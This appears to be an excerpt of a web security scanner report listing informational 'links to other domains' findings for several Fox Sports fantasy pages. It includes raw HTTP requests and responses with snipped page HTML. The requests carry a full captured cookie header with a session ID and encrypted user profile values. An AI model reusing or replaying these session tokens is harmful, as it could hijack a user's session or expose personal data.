<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportssouthwest.com/01/05/11/Tannehill-hopes-to-continue-winning-ways/landing_big12.html?blockID=385631&amp;feedID=3673' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Keep the change');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Keep the change') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<li>
           <a href="http://cfn.scout.com/2/1036442.html">CFB: NFL early entries analysis </a>
...[SNIP]...
<li>
           <a href="http://cfn.scout.com/2/1036442.html"> </a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=bee1e6c5-cfbf-47eb-a69f-e90c5ecda39c&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=bee1e6c5-cfbf-47eb-a69f-e90c5ecda39c&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=b22c5085-d0f5-494f-a5a9-b497c96d1232&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b22c5085-d0f5-494f-a5a9-b497c96d1232&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=cc583e25-3e4c-487e-bf25-ff005f8ce822&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=cc583e25-3e4c-487e-bf25-ff005f8ce822&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=0f918bd3-af4d-456e-bf18-4bc5783da5f1&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=0f918bd3-af4d-456e-bf18-4bc5783da5f1&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=405a265f-6b52-4892-a55e-a4286a55d06b&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=405a265f-6b52-4892-a55e-a4286a55d06b&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...


   
<a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...


   
        <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://www.whatifsports.com/x.asp?r=678106&amp;u=gd "><img src="http://static.foxsports.com/content/fscom/img/2010/11/24/GD_300x90_20101124150713_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.9. http://msn.foxsports.com/fantasy/basketball/hotstreak/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fantasy/basketball/hotstreak/?nicmp=BKHS10&nichn=FSHP&niseg=FEATURES HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27428
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscfPwDi4Q23xgrpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- Begin 'Like' button-->
<iframe src="http://www.facebook.com/plugins/like.php?href=http://msn.foxsports.com/fantasy/basketball/hotstreak/&amp;layout=standard&amp;show_faces=true&amp;width=300&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl01_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/H4Z9PUoQ9ls/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611" target="_blank">Commish: 'The Decision' right for NBA</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl02_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/PoaOZUw1M4g/nowitzki-unsure-when-he-will-return" target="_blank">Nowitzki unsure when he will return</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl03_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/KfDb-0nCTok/Houston-Rockets-Yao-Ming-scheduled-for-ankle-surgery-010611" target="_blank">Yao undergoes another ankle surgery</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl04_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/C_Ortfu5SCg/Kevin-Durant-powers-Oklahoma-City-Thunder-past-short-handed-Dallas-Mavericks-010611" target="_blank">Durant powers Thunder past Mavericks</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl05_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/gWaGK9vLpl4/LeBron-James-Dwyane-Wade-lead-in-NBA-All-Star-Game-voting-010611" target="_blank">LeBron, Wade have edge on KG, Rondo</a>
...[SNIP]...
<h3><a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3><a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3><a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3><a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3><a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3><a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3><a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li><a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li><a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li><a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li><a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last"><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
               <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js" language="javascript"></script>
...[SNIP]...
<span><img width="0" height="0" alt="" style="display: none;" src="http://b.scorecardresearch.com/b?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1"></span>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.10. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/bowlpickem/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fantasy/collegefootball/bowlpickem/?nicmp=BPKM10&nichn=FSHP&niseg=FEATURES HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 33174
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fc156a;path=/
Expires: Sat, 08 Jan 2011 01:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


   
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</div>
<a href="http://www.whatifsports.com/x.asp?r=678106&u=decmadness" target="_blank"><img src="/fantasy/collegefootball/bowlpickem/public/fe/img/game-front/December_Madness_300x90.jpg" width="300" height="90" alt="2010 College Football Playoff Simulation by WhatIfSports" title="2010 Co
...[SNIP]...
<br>&#8226;&nbsp;<a blurb="Wisconsin running back John Clay says he will enter the NFL draft." href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&feedID=5059">RB Clay, too</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                <a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li>
                <a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                <a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li>
                <a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li>
                <a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last">
                <a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a></li>
        <li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.11. http://msn.foxsports.com/fantasy/collegefootball/pickem/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/pickem/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fantasy/collegefootball/pickem/?nicmp=CFBPM&nichn=FSROS&niseg=FSFEATURESHP HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 